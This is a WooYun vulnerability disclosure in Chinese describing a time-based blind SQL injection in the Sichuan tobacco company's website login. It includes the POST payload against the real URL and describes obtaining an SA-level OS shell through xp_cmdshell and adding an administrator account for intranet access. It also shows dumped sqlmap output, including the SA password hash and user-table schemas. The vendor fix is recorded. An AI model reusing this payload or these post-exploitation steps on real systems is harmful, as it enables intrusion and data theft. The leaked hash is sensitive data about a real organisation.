当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0104036

漏洞标题:四川烟草网MSSQL遇SA权限能执行0S-SHELL成功提权服务器(可内网渗透)

相关厂商:四川烟草工业有限责任公司

漏洞作者: 千斤拨四两

提交时间:2015-03-27 00:20

修复时间:2015-03-27 11:24

公开时间:2015-03-27 11:24

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经修复

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-03-27: 细节已通知厂商并且等待厂商处理中
2015-03-27: 厂商已经确认,细节仅向厂商公开
2015-03-27: 厂商已经修复漏洞并主动公开,细节向公众公开

简要描述:

在后台登陆框用户名参数存在基于时间的盲注,SQLMAP可直接获取SA权限执行系统命令!

详细说明:

POC:

http://www.scti.cn/WebSiteMaintain2014/checkLogOn.do
下面是POST提交内容:
Button2=&password=&rememberUserNameCheckBox=&user_name=-1' or 51 = '49'; WAITFOR DELAY '0:0:5'--&__EVENTVALIDATION=/wEWBQKXspW9DwL9lveNCgLyveCRDwK7q7GGCAKxlvb0BVFfM467wXsnDsVZkemwGxMBVR+7&__VIEWSTATE=/wEPDwUJODAxNjkyMzMwZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WAgUHQnV0dG9uMgUYcmVtZW1iZXJVc2VyTmFtZUNoZWNrQm94MWP2irUu6DSaU60Ombou6nrvC+c=


user_name参数可利用时间戳盲注!
下面看步骤现行判断当时权限,直接执行命令:

c.png


SA权限,可尝试os-shell若是xp_cmdshell没有查出可直接获取系统权限。
即为SA权限也可爆出数据裤密码,执行命令。

v.png


若是1433端口开放也可连接数据库,但是1433开放,执行OS-SHELL。
执行成功,直接判断系统环境。

b.png


直接着执行命令看看当前用户的权限:

n.png


哈哈,直接是系统管理员的权限和那些用户,看看一下服务器所处的的环境。

n.jpg


e.png


所处环境是内网10.164.x.x的,执行net user添加系统用户,不在赘述直接上图!

admin.png


admins.png


分分钟直接添加成功,可内网渗透!
贴出一些数据库爆出的信息:

available databases [11]:
[*] master
[*] model
[*] msdb
[*] Northwind
[*] ProductionManage
[*] ProductionPlanManage
[*] pubs
[*] scgy_cd
[*] scgyWW
[*] tempdb
[*] WebSite2014


database management system users password hashes:
[*] sa [1]:
password hash: 0x0100e91f3a04fdf44e6586452bfb91e24c7819156597b34a5bea80ef1526af4f7a2a5274a0d6581c3f0495fa8be7\x02!


Database: WebSite2014
[40 tables]
+----------------------------+
| dtproperties |
| sqlmapoutput |
| sysconstraints |
| syssegments |
| v_dm_location |
| v_getdate |
| v_xt_dept |
| v_xt_organise |
| v_xt_t_user |
| ww_attached_property_group |
| ww_attached_property_set |
| ww_attached_property_value |
| ww_base_info |
| ww_content |
| ww_content_adjunct |
| ww_friend_website |
| ww_invite_adjunct |
| ww_invite_content |
| ww_mod |
| ww_query_authority |
| ww_visits_info |
| xt_t_data_dict |
| xt_t_error_log |
| xt_t_function_mod |
| xt_t_log |
| xt_t_log_info |
| xt_t_log_set |
| xt_t_mod_access |
| xt_t_mod_access_detail |
| xt_t_modulehelp |
| xt_t_organise |
| xt_t_param_enum_type_value |
| xt_t_parameter |
| xt_t_parameter_disp_rows |
| xt_t_parameter_type |
| xt_t_role |
| xt_t_role_popedom |
| xt_t_shortcut_function |
| xt_t_user |
| xt_t_user_role |
+----------------------------+


Database: WebSite2014
Table: v_xt_t_user
[12 columns]
+---------------+----------+
| Column | Type |
+---------------+----------+
| keyid | numeric |
| note_date | datetime |
| person_id | numeric |
| remark | varchar |
| sort_id | int |
| unit_id | numeric |
| unitid | varchar |
| use_flag | char |
| user_account | varchar |
| user_name | varchar |
| user_password | varchar |
| userid | varchar |
+---------------+----------+


Database: WebSite2014
Table: v_t_user
[4 columns]
+----------------+-------------+
| Column | Type |
+----------------+-------------+
| dat_utente_cre | non-numeric |
| ken_kanji | non-numeric |
| mgr | non-numeric |
| user_uname | non-numeric |


漏洞证明:

这些事一些贴图用户证明!

x.png


z.png


q.png


w.png


r.png


修复方案:

过滤修补SQL注射,把系统xp_cmdshell插件删除!

版权声明:转载请注明来源 千斤拨四两@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-03-27 11:23

厂商回复:

已修复

最新状态:

2015-03-27:已修复

2015-03-27:已修复